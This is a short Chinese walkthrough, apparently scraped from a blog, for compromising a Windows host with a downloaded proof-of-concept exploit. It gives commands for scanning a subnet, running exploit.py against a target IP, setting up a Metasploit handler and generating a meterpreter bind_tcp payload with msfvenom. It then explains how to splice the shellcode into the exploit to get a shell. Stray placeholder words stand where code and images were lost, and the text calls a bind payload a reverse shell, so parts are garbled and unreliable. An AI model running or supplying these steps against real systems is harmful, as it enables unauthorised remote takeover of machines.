环境准备:python
漏洞检测工具下载地址:git
pythone3 scanner.py 192.168.0.0/24
PoC下载地址:shell
python3.8 exploit.py -ip 192.168.201.132
一、先对使用 kali 对 9999 端口进行监听:tcp
msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcp set lport 9999 set rhost 192.168.201.132 run
二、kali 使用 msf 生成木马(此处端口需跟监听的端口是一致的)工具
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=9999 -b '\x00' -i 1 -f python>test.py
木马生成后的内容为:
code
下载好的 POC:
blog
三、先把木马的内的 buf 替换为 USER_PAYLOAD ,再替换 exploit.py 内的 USER_PAYLOAD 行的内容图片
四、使用 Python3 运行(在此处需按一次回车)
五、此时监听的 9999 端口已收到访反弹的 shell